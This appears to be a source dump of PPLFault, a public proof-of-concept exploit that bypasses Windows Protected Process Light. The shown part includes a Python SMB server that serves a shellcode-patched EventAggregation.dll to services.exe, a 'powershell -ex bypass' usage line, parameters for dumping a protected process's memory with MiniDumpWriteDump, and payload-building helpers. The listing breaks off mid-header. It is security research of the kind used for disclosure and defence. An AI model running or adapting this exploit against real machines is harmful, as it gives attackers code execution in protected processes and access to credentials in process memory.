├── .gitignore ├── PPLFault ├── resource.h ├── PPLFault.h ├── Payload.aps ├── PPLFault.vcxproj.user ├── Payload.rc ├── Payload.h ├── PPLFault.vcxproj.filters ├── Payload.cpp └── PPLFault.vcxproj ├── GMShellcode ├── GMShellcode.def ├── GMShellcode.vcxproj.user ├── FunctionOrder.txt ├── GMShellcode.vcxproj.filters ├── GMShellcode.vcxproj ├── GMShellcode.h └── GMShellcode.c ├── GodFault ├── resource.h ├── Payload.aps ├── GodFault.vcxproj.user ├── Payload.rc ├── Payload.h ├── GodFault.vcxproj.filters ├── IPC.cpp ├── GodFault.vcxproj └── Payload.cpp ├── DumpShellcode ├── DumpShellcode.def ├── FunctionOrder.txt ├── DumpShellcode.vcxproj.user ├── DumpShellcode.vcxproj.filters ├── DumpShellcode.h ├── DumpShellcode.c └── DumpShellcode.vcxproj ├── Utils ├── MemoryCommand.h ├── Logging.h ├── PayloadUtils.h ├── Logging.cpp ├── MemoryCommand.cpp ├── PayloadUtils.cpp └── Utils.vcxproj ├── NoFault ├── NoFault.vcxproj.user ├── NoFault.vcxproj.filters ├── NoFault.h ├── NoFault.vcxproj └── NoFault.cpp ├── phnt ├── zw_options.txt ├── include │ ├── ntsmss.h │ ├── ntnls.h │ ├── ntxcapi.h │ ├── phnt_windows.h │ ├── phnt.h │ ├── subprocesstag.h │ ├── ntmisc.h │ ├── ntkeapi.h │ ├── ntgdi.h │ ├── ntpnpapi.h │ ├── ntdbg.h │ ├── phnt_ntdef.h │ ├── ntpfapi.h │ ├── nttp.h │ ├── ntobapi.h │ └── nttmapi.h └── README.md ├── python ├── README.md ├── smbserver.py └── PPLFault-Localhost-SMB.ps1 ├── LICENSE.txt ├── PPLFault.sln └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .vs 2 | x64 -------------------------------------------------------------------------------- /PPLFault/resource.h: -------------------------------------------------------------------------------- 1 | #define RES_PAYLOAD 1000 2 | -------------------------------------------------------------------------------- /PPLFault/PPLFault.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | 4 | 5 | 
-------------------------------------------------------------------------------- /GMShellcode/GMShellcode.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | 3 | Shellcode 4 | EndShellcode 5 | -------------------------------------------------------------------------------- /GodFault/resource.h: -------------------------------------------------------------------------------- 1 | #define RES_PAYLOAD 1000 2 | #define RES_ORCHARD 1001 3 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | 3 | Shellcode 4 | EndShellcode 5 | -------------------------------------------------------------------------------- /DumpShellcode/FunctionOrder.txt: -------------------------------------------------------------------------------- 1 | Shellcode 2 | WhereAmI 3 | GetParams 4 | EndShellcode 5 | main -------------------------------------------------------------------------------- /GodFault/Payload.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gabriellandau/PPLFault/HEAD/GodFault/Payload.aps -------------------------------------------------------------------------------- /PPLFault/Payload.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gabriellandau/PPLFault/HEAD/PPLFault/Payload.aps -------------------------------------------------------------------------------- /Utils/MemoryCommand.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | #define SE_PROFILE_SINGLE_PROCESS_PRIVILEGE 13 7 | 8 | bool EmptySystemWorkingSet(); 9 | -------------------------------------------------------------------------------- /NoFault/NoFault.vcxproj.user: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /GodFault/GodFault.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /PPLFault/PPLFault.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /GMShellcode/GMShellcode.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /GMShellcode/FunctionOrder.txt: -------------------------------------------------------------------------------- 1 | Shellcode 2 | ServicesShellcode 3 | CsrssShellcode 4 | CurrentTeb 5 | WhereAmI 6 | _wcslen 7 | _RtlInitUnicodeString 8 | memeq 9 | FindMyBase 10 | GetParams 11 | EndShellcode 12 | main -------------------------------------------------------------------------------- /GodFault/Payload.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | 3 | #ifdef _DEBUG 4 | RES_PAYLOAD RCDATA "..\\x64\\Debug\\GMShellcode.exe.shellcode" 5 | #else 6 | RES_PAYLOAD RCDATA "..\\x64\\Release\\GMShellcode.exe.shellcode" 7 | #endif -------------------------------------------------------------------------------- /PPLFault/Payload.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | 3 | #ifdef _DEBUG 4 | RES_PAYLOAD RCDATA 
"..\\x64\\Debug\\DumpShellcode.exe.shellcode" 5 | #else 6 | RES_PAYLOAD RCDATA "..\\x64\\Release\\DumpShellcode.exe.shellcode" 7 | #endif 8 | -------------------------------------------------------------------------------- /PPLFault/Payload.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | bool BuildPayload( 7 | HANDLE hBenignDll, 8 | std::string& payloadBuffer, 9 | DWORD dwTargetProcessId, 10 | PCWCHAR pDumpPath); 11 | -------------------------------------------------------------------------------- /GodFault/Payload.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | bool BuildPayload( 8 | HANDLE hBenignDll, 9 | std::string& payloadBuffer); 10 | 11 | bool BlessThread(DWORD dwThreadId, bool bFatal); -------------------------------------------------------------------------------- /Utils/Logging.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define Log(lvl, fmt, ...) LogMessage(LogLevel::##lvl, fmt, ##__VA_ARGS__) 6 | 7 | enum class LogLevel 8 | { 9 | Debug = 0, 10 | Info = 1, 11 | Warning = 2, 12 | Error = 3, 13 | }; 14 | 15 | void 16 | LogMessage( 17 | LogLevel level, 18 | const char* fmt, 19 | ...); 20 | 21 | void SetLogLevel(LogLevel lvl); 22 | -------------------------------------------------------------------------------- /phnt/zw_options.txt: -------------------------------------------------------------------------------- 1 | base=include 2 | in=ntdbg.h;ntexapi.h;ntgdi.h;ntioapi.h;ntkeapi.h;ntldr.h;ntlpcapi.h;ntmisc.h;ntmmapi.h;ntnls.h;ntobapi.h;ntpebteb.h;ntpfapi.h;ntpnpapi.h;ntpoapi.h;ntpsapi.h;ntregapi.h;ntrtl.h;ntsam.h;ntseapi.h;nttmapi.h;nttp.h;ntwow64.h;ntxcapi.h 3 | out=ntzwapi.h 4 | header=#ifndef _NTZWAPI_H\r\n#define _NTZWAPI_H\r\n\r\n// This file was automatically generated. 
Do not edit.\r\n\r\n 5 | footer=#endif\r\n -------------------------------------------------------------------------------- /Utils/PayloadUtils.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | 6 | // Finds the address within buf of the image entrypoint 7 | PVOID FindEntrypointVA(const std::string& buf); 8 | 9 | // Build a payload that consists of the given benign DLL with its entrypoint overwritten by our shellcode 10 | bool WriteShellcode(LPCWSTR lpResourceName, PVOID pBuf, SIZE_T maxLength, DWORD& bytesWritten); 11 | -------------------------------------------------------------------------------- /python/README.md: -------------------------------------------------------------------------------- 1 | # PPLFault via localhost SMB 2 | 3 | Performs the PPLFault exploit via a localhost SMB server. 4 | 5 | Usage: 6 | ``` 7 | powershell -ex bypass PPLFault-Localhost-SMB.ps1 8 | ``` 9 | 10 | If this machine has not yet run the exploit, the first run will perform some initial setup then prompt to reboot. Once setup has been completed, re-run the script to perform the exploit. 11 | 12 | The included payload runs an infinite loop inside `services.exe` running as `PsProtectedSignerWinTcb-Light`. 13 | -------------------------------------------------------------------------------- /phnt/include/ntsmss.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Windows Session Manager support functions 3 | * 4 | * This file is part of System Informer. 
5 | */ 6 | 7 | #ifndef _NTSMSS_H 8 | #define _NTSMSS_H 9 | 10 | NTSYSAPI 11 | NTSTATUS 12 | NTAPI 13 | RtlConnectToSm( 14 | _In_ PUNICODE_STRING ApiPortName, 15 | _In_ HANDLE ApiPortHandle, 16 | _In_ DWORD ProcessImageType, 17 | _Out_ PHANDLE SmssConnection 18 | ); 19 | 20 | NTSYSAPI 21 | NTSTATUS 22 | NTAPI 23 | RtlSendMsgToSm( 24 | _In_ HANDLE ApiPortHandle, 25 | _In_ PPORT_MESSAGE MessageData 26 | ); 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /Utils/Logging.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #include 5 | #include 6 | #include 7 | #include "Logging.h" 8 | 9 | /* Minimum level that LogMessage() will print; defaults to Info. Not synchronised - written by SetLogLevel(), read by LogMessage(). */ LogLevel gLogLevel = LogLevel::Info; 10 | 11 | /* Replaces the file-scope threshold used by LogMessage(); messages below `lvl` are dropped from then on. */ void SetLogLevel(LogLevel lvl) 12 | { 13 | gLogLevel = lvl; 14 | } 15 | 16 | /* Prints one log line to stdout: the prefix for `level`, the caller's printf-style `fmt` expanded with the variadic arguments, and a trailing newline. Messages whose `level` is below gLogLevel are dropped. `fmt` is passed to vprintf as the format string, so callers must supply a literal format and route any untrusted or user-controlled text through a "%s" argument (every caller visible in this tree does). There is no return value and no error reporting; vprintf's result is discarded. */ void 17 | LogMessage( 18 | LogLevel level, 19 | const char* fmt, 20 | ...) 21 | { 22 | va_list va; 23 | int result = 0; /* NOTE(review): never read. */ 24 | std::string prefixedFmt; 25 | 26 | /* Indexed by (size_t)level below; Debug and Info share the same prefix. There is no bounds check, so a LogLevel value outside the four enumerators in Logging.h would index past this table. */ const static char* prefixes[] = { 27 | " [+] ", // Debug 28 | " [+] ", // Info 29 | " [?] ", // Warning 30 | " [!] 
" // Error 31 | }; 32 | 33 | if (level < gLogLevel) 34 | { 35 | return; 36 | } 37 | 38 | /* Build "<prefix><fmt>\n" once so the newline is part of the same vprintf call as the message. */ prefixedFmt = prefixes[(size_t)level] + std::string(fmt) + "\n"; 39 | 40 | va_start(va, fmt); 41 | 42 | vprintf(prefixedFmt.c_str(), va); 43 | 44 | va_end(va); 45 | 46 | return; 47 | } 48 | -------------------------------------------------------------------------------- /GMShellcode/GMShellcode.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | 19 | 20 | Source Files 21 | 22 | 23 | 24 | 25 | Header Files 26 | 27 | 28 | -------------------------------------------------------------------------------- /phnt/include/ntnls.h: -------------------------------------------------------------------------------- 1 | /* 2 | * National Language Support functions 3 | * 4 | * This file is part of System Informer. 
5 | */ 6 | 7 | #ifndef _NTNLS_H 8 | #define _NTNLS_H 9 | 10 | #define MAXIMUM_LEADBYTES 12 11 | 12 | typedef struct _CPTABLEINFO 13 | { 14 | USHORT CodePage; 15 | USHORT MaximumCharacterSize; 16 | USHORT DefaultChar; 17 | USHORT UniDefaultChar; 18 | USHORT TransDefaultChar; 19 | USHORT TransUniDefaultChar; 20 | USHORT DBCSCodePage; 21 | UCHAR LeadByte[MAXIMUM_LEADBYTES]; 22 | PUSHORT MultiByteTable; 23 | PVOID WideCharTable; 24 | PUSHORT DBCSRanges; 25 | PUSHORT DBCSOffsets; 26 | } CPTABLEINFO, *PCPTABLEINFO; 27 | 28 | typedef struct _NLSTABLEINFO 29 | { 30 | CPTABLEINFO OemTableInfo; 31 | CPTABLEINFO AnsiTableInfo; 32 | PUSHORT UpperCaseTable; 33 | PUSHORT LowerCaseTable; 34 | } NLSTABLEINFO, *PNLSTABLEINFO; 35 | 36 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 37 | NTSYSAPI USHORT NlsAnsiCodePage; 38 | NTSYSAPI BOOLEAN NlsMbCodePageTag; 39 | NTSYSAPI BOOLEAN NlsMbOemCodePageTag; 40 | #endif 41 | 42 | #endif 43 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | 19 | 20 | Source Files 21 | 22 | 23 | 24 | 25 | Header Files 26 | 27 | 28 | -------------------------------------------------------------------------------- /phnt/README.md: -------------------------------------------------------------------------------- 1 | This collection of Native API header files has been maintained since 2009 for the Process Hacker project, and is the most up-to-date set of Native API definitions that I know of. I have gathered these definitions from official Microsoft header files and symbol files, as well as a lot of reverse engineering and guessing. 
See `phnt.h` for more information. 2 | 3 | ## Usage 4 | 5 | First make sure that your program is using the latest Windows SDK. 6 | 7 | These header files are designed to be used by user-mode programs. Instead of `#include `, place 8 | 9 | ``` 10 | #include 11 | #include 12 | ``` 13 | 14 | at the top of your program. The first line provides access to the Win32 API as well as the `NTSTATUS` values. The second line provides access to the entire Native API. By default, only definitions present in Windows XP are included into your program. To change this, use one of the following: 15 | 16 | ``` 17 | #define PHNT_VERSION PHNT_WINXP // Windows XP 18 | #define PHNT_VERSION PHNT_WS03 // Windows Server 2003 19 | #define PHNT_VERSION PHNT_VISTA // Windows Vista 20 | #define PHNT_VERSION PHNT_WIN7 // Windows 7 21 | #define PHNT_VERSION PHNT_WIN8 // Windows 8 22 | #define PHNT_VERSION PHNT_WINBLUE // Windows 8.1 23 | #define PHNT_VERSION PHNT_THRESHOLD // Windows 10 24 | ``` 25 | -------------------------------------------------------------------------------- /NoFault/NoFault.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {8E41214B-6785-4CFE-B992-037D68949A14} 18 | inf;inv;inx;mof;mc; 19 | 20 | 21 | 22 | 23 | Source Files 24 | 25 | 26 | 27 | 28 | Header Files 29 | 30 | 31 | -------------------------------------------------------------------------------- /Utils/MemoryCommand.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #include 5 | #include 6 | #define 
WIN32_NO_STATUS 7 | #include 8 | #include "MemoryCommand.h" 9 | #include "Logging.h" 10 | 11 | /* Enables SeProfileSingleProcessPrivilege for the calling process (RtlAdjustPrivilege with IsThreadPrivilege = FALSE) and then asks the memory manager, via NtSetSystemInformation(SystemMemoryListInformation), first to empty working sets (MemoryEmptyWorkingSets) and then to purge the standby list (MemoryPurgeStandbyList). Returns true only when all three native calls return 0; on the first non-zero NTSTATUS it logs at Error and returns false, leaving any earlier step in effect. The privilege's previous state (`ignore`) is discarded and never restored, so the privilege remains enabled for the rest of the process lifetime. Takes no parameters. */ bool EmptySystemWorkingSet() 12 | { 13 | NTSTATUS ntStatus = STATUS_SUCCESS; 14 | DWORD command = 0; 15 | BOOLEAN ignore = 0; 16 | 17 | // Enable SeProfileSingleProcessPrivilege which is required for SystemMemoryListInformation 18 | ntStatus = RtlAdjustPrivilege(SE_PROFILE_SINGLE_PROCESS_PRIVILEGE, TRUE, FALSE, &ignore); 19 | /* Any non-zero NTSTATUS, including warning/informational codes, is treated as failure here and in the two checks below. */ if (0 != ntStatus) 20 | { 21 | Log(Error, "Failed to enable SeProfileSingleProcessPrivilege with NTSTATUS 0x%08x", ntStatus); 22 | return false; 23 | } 24 | 25 | // Empty working sets 26 | command = MemoryEmptyWorkingSets; 27 | ntStatus = NtSetSystemInformation(SystemMemoryListInformation, &command, sizeof(command)); 28 | if (0 != ntStatus) 29 | { 30 | Log(Error, "Failed to empty working sets with NTSTATUS 0x%08x", ntStatus); 31 | return false; 32 | } 33 | 34 | // Empty system standby list 35 | command = MemoryPurgeStandbyList; 36 | ntStatus = NtSetSystemInformation(SystemMemoryListInformation, &command, sizeof(command)); 37 | if (0 != ntStatus) 38 | { 39 | Log(Error, "Failed to empty standby list with NTSTATUS 0x%08x", ntStatus); 40 | return false; 41 | } 42 | 43 | Log(Debug, "Working set purged"); 44 | 45 | return true; 46 | } 47 | -------------------------------------------------------------------------------- /GodFault/GodFault.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | 29 | 30 | Header Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | 
Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | 43 | 44 | Resource Files 45 | 46 | 47 | -------------------------------------------------------------------------------- /PPLFault/PPLFault.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | Header Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | 43 | 44 | Resource Files 45 | 46 | 47 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | typedef NTSTATUS (NTAPI * RtlAdjustPrivilege_t)( 12 | DWORD privilege, 13 | BOOL bEnablePrivilege, 14 | BOOL IsThreadPrivilege, 15 | PDWORD PreviousValue); 16 | 17 | typedef HMODULE(WINAPI* LoadLibraryW_t)( 18 | LPCWSTR lpLibFileName 19 | ); 20 | 21 | typedef FARPROC(WINAPI* GetProcAddress_t)( 22 | HMODULE hModule, 23 | LPCSTR lpProcName 24 | ); 25 | 26 | typedef HANDLE(WINAPI* OpenProcess_t)( 27 | DWORD dwDesiredAccess, 28 | BOOL bInheritHandle, 29 | DWORD dwProcessId 30 | ); 31 | 32 | typedef HANDLE(WINAPI* CreateFileW_t)( 33 | LPCWSTR lpFileName, 34 | DWORD dwDesiredAccess, 35 | DWORD dwShareMode, 36 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, 37 | DWORD dwCreationDisposition, 38 | DWORD dwFlagsAndAttributes, 39 | HANDLE hTemplateFile 40 | ); 
41 | 42 | typedef BOOL(WINAPI* TerminateProcess_t)( 43 | HANDLE hProcess, 44 | UINT uExitCode 45 | ); 46 | 47 | typedef BOOL(WINAPI* MiniDumpWriteDump_t)( 48 | HANDLE hProcess, 49 | DWORD ProcessId, 50 | HANDLE hFile, 51 | MINIDUMP_TYPE DumpType, 52 | PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, 53 | PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, 54 | PMINIDUMP_CALLBACK_INFORMATION CallbackParam 55 | ); 56 | 57 | #define MAGIC1 0x1BADC0D3 58 | #define MAGIC2 0xDEADBEEF 59 | 60 | typedef struct _SHELLCODE_PARAMS 61 | { 62 | DWORD magic1; 63 | DWORD magic2; 64 | 65 | // User params 66 | DWORD dwTargetProcessId; 67 | WCHAR dumpPath[MAX_PATH]; 68 | 69 | // Strings (so we don't have to embed them in shellcode) 70 | CHAR szMiniDumpWriteDump[20]; // "MiniDumpWriteDump" 71 | WCHAR szDbgHelpDll[12]; // L"Dbghelp.dll" 72 | 73 | // IAT 74 | LoadLibraryW_t pLoadLibraryW; 75 | GetProcAddress_t pGetProcAddress; 76 | OpenProcess_t pOpenProcess; 77 | CreateFileW_t pCreateFileW; 78 | TerminateProcess_t pTerminateProcess; 79 | RtlAdjustPrivilege_t pRtlAdjustPrivilege; 80 | } SHELLCODE_PARAMS, * PSHELLCODE_PARAMS; 81 | 82 | #ifdef __cplusplus 83 | } // extern "C" 84 | #endif 85 | -------------------------------------------------------------------------------- /Utils/PayloadUtils.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #define _CRT_SECURE_NO_WARNINGS 5 | #include "PayloadUtils.h" 6 | #include 7 | #include 8 | #include "Logging.h" 9 | 10 | extern bool InitShellcodeParams( 11 | PVOID pParams, 12 | DWORD dwTargetProcessId, 13 | PCWCHAR pDumpPath 14 | ); 15 | 16 | // Finds the address within buf of the image entrypoint 17 | PVOID FindEntrypointVA(const std::string& buf) 18 | { 19 | PVOID pBase = (PVOID)buf.data(); 20 | PIMAGE_NT_HEADERS pNtHeaders = ImageNtHeader(pBase); 21 | 22 | if (NULL == pNtHeaders) 23 | { 24 | Log(Error, "FindOffsetOfEntrypoint: 
ImageNtHeader failed with GLE %u. Is this a PE file?", GetLastError()); 25 | return NULL; 26 | } 27 | 28 | if (IMAGE_FILE_MACHINE_AMD64 != pNtHeaders->FileHeader.Machine) 29 | { 30 | Log(Error, "FindOffsetOfEntrypoint: Only x64 is supported"); 31 | return NULL; 32 | } 33 | 34 | // Map RVA -> VA 35 | return ImageRvaToVa(pNtHeaders, pBase, pNtHeaders->OptionalHeader.AddressOfEntryPoint, NULL); 36 | } 37 | 38 | // Pulls the shellcode out of our resource section and writes to the given pointer 39 | /* Looks up RCDATA resource `lpResourceName` in the current module (FindResourceW with hModule NULL), copies its bytes into `pBuf` and reports the count through `bytesWritten`. Returns false, after an Error log, when the lookup or LockResource fails, when SizeofResource reports 0, or when the resource is larger than `maxLength`; `pBuf` and `bytesWritten` are written only after the size check passes, so on failure the caller's buffer is untouched. The log messages still use the function's earlier name, "GetShellcode". */ bool WriteShellcode(LPCWSTR lpResourceName, PVOID pBuf, SIZE_T maxLength, DWORD& bytesWritten) 40 | { 41 | HRSRC hr = NULL; 42 | HGLOBAL hg = NULL; 43 | LPVOID pResource = NULL; 44 | DWORD rSize = 0; 45 | 46 | hr = FindResourceW(NULL, lpResourceName, RT_RCDATA); 47 | if (!hr) 48 | { 49 | Log(Error, "GetShellcode: FindResource failed with GLE %u", GetLastError()); 50 | return false; 51 | } 52 | 53 | hg = LoadResource(NULL, hr); 54 | /* NOTE(review): this re-tests hr, which is already known to be non-NULL; the LoadResource result hg is not checked here, so a NULL hg reaches LockResource below and is caught, if at all, only by that call's NULL check. */ if (!hr) 55 | { 56 | Log(Error, "GetShellcode: LoadResource failed with GLE %u", GetLastError()); 57 | return false; 58 | } 59 | 60 | pResource = (LPVOID)LockResource(hg); 61 | if (!pResource) 62 | { 63 | Log(Error, "GetShellcode: LockResource failed with GLE %u", GetLastError()); 64 | return false; 65 | } 66 | 67 | rSize = SizeofResource(NULL, hr); 68 | if (!rSize) 69 | { 70 | Log(Error, "GetShellcode: SizeofResource returned 0 and GLE %u", GetLastError()); 71 | return false; 72 | } 73 | 74 | /* Bounds check before the memcpy below: rSize is the resource's size, maxLength the caller's buffer capacity. */ if (rSize > maxLength) 75 | { 76 | /* NOTE(review): copy-pasted message; this branch means the resource (rSize bytes) exceeds maxLength, and GetLastError() is unrelated to that condition. */ Log(Error, "GetShellcode: SizeofResource returned 0 and GLE %u", GetLastError()); 77 | return false; 78 | } 79 | 80 | memcpy(pBuf, pResource, rSize); 81 | bytesWritten = rSize; 82 | 83 | Log(Debug, "GetShellcode: %u bytes of shellcode written over DLL entrypoint", rSize); 84 | 85 | /* NOTE(review): FreeResource is handed the locked pointer rather than the HGLOBAL hg returned by LoadResource. */ FreeResource(pResource); 86 | 87 | return true; 88 | } 89 | -------------------------------------------------------------------------------- /python/smbserver.py: -------------------------------------------------------------------------------- 1 
| # PPLFault Localhost SMB Exploit 2 | # Gabriel Landau (@GabrielLandau) @ Elastic Security 3 | # 4 | # Wraps Impacket SMB server to serve two versions of a file for the same path. 5 | 6 | import os 7 | import msvcrt 8 | import pefile 9 | import argparse 10 | import win32con 11 | import win32file 12 | 13 | from impacket import smbserver 14 | 15 | HOOK_FD = None 16 | READ_COUNT = 0 17 | ORIG_READ = None 18 | ORIG_LSEEK = None 19 | 20 | def hook_read(fd, n): 21 | global HOOK_FD, READ_COUNT, ORIG_READ 22 | 23 | READ_COUNT += 1 24 | file_path = win32file.GetFinalPathNameByHandle(msvcrt.get_osfhandle(fd), win32con.VOLUME_NAME_NONE) 25 | 26 | if 'EventAggregation' in file_path: 27 | if READ_COUNT >= 3: 28 | fd = HOOK_FD 29 | print(f"Hooked read #{READ_COUNT}: PATCH") 30 | else: 31 | print(f"Hooked read #{READ_COUNT}: PASSTHROUGH") 32 | 33 | return ORIG_READ(fd, n) 34 | 35 | def hook_lseek(fd, pos, how): 36 | global HOOK_FD, READ_COUNT, ORIG_LSEEK 37 | file_path = win32file.GetFinalPathNameByHandle(msvcrt.get_osfhandle(fd), win32con.VOLUME_NAME_NONE) 38 | 39 | if 'EventAggregation' in file_path: 40 | fd = HOOK_FD 41 | 42 | ORIG_LSEEK(fd, pos, how) 43 | 44 | def patch(payload_hex): 45 | global HOOK_FD, ORIG_READ, ORIG_LSEEK 46 | 47 | src_path = r"C:\Windows\System32\EventAggregation.dll.bak" 48 | fc = open(src_path,'rb').read() 49 | 50 | payload = bytes.fromhex(payload_hex) 51 | pe = pefile.PE(src_path) 52 | offset = pe.get_offset_from_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint) 53 | length = len(payload) 54 | 55 | # Patch DllMain() with the payload 56 | patched_path = ".\EventAggregation.dll.patched" 57 | with open(patched_path,'wb') as out: 58 | out.write(fc[:offset]) 59 | out.write(payload) 60 | out.write(fc[offset+length:]) 61 | 62 | HOOK_FD = os.open(patched_path, os.O_RDONLY | os.O_BINARY) 63 | 64 | ORIG_READ = os.read 65 | os.read = hook_read 66 | 67 | ORIG_LSEEK = os.lseek 68 | os.lseek = hook_lseek 69 | 70 | if __name__ == '__main__': 71 | 72 | parser = 
argparse.ArgumentParser(add_help = True) 73 | parser.add_argument('-payload', action='store', default="ebfe", help='Shellcode payload for services.exe (hex - default EBFE infinite loop)') 74 | options = parser.parse_args() 75 | 76 | server = smbserver.SimpleSMBServer(listenAddress='127.0.0.1', listenPort=445) 77 | server.addShare('C$', 'C:\\', '') 78 | server.setSMB2Support(True) 79 | server.setSMBChallenge('') 80 | server.setLogFile('') 81 | 82 | patch(options.payload) 83 | server.start() 84 | -------------------------------------------------------------------------------- /phnt/include/ntxcapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Exception support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTXCAPI_H 8 | #define _NTXCAPI_H 9 | 10 | NTSYSAPI 11 | BOOLEAN 12 | NTAPI 13 | RtlDispatchException( 14 | _In_ PEXCEPTION_RECORD ExceptionRecord, 15 | _In_ PCONTEXT ContextRecord 16 | ); 17 | 18 | NTSYSAPI 19 | DECLSPEC_NORETURN 20 | VOID 21 | NTAPI 22 | RtlRaiseStatus( 23 | _In_ NTSTATUS Status 24 | ); 25 | 26 | NTSYSAPI 27 | VOID 28 | NTAPI 29 | RtlRaiseException( 30 | _In_ PEXCEPTION_RECORD ExceptionRecord 31 | ); 32 | 33 | NTSYSCALLAPI 34 | NTSTATUS 35 | NTAPI 36 | NtContinue( 37 | _In_ PCONTEXT ContextRecord, 38 | _In_ BOOLEAN TestAlert 39 | ); 40 | 41 | #if (PHNT_VERSION >= PHNT_THRESHOLD) 42 | typedef enum _KCONTINUE_TYPE 43 | { 44 | KCONTINUE_UNWIND, 45 | KCONTINUE_RESUME, 46 | KCONTINUE_LONGJUMP, 47 | KCONTINUE_SET, 48 | KCONTINUE_LAST, 49 | } KCONTINUE_TYPE; 50 | 51 | typedef struct 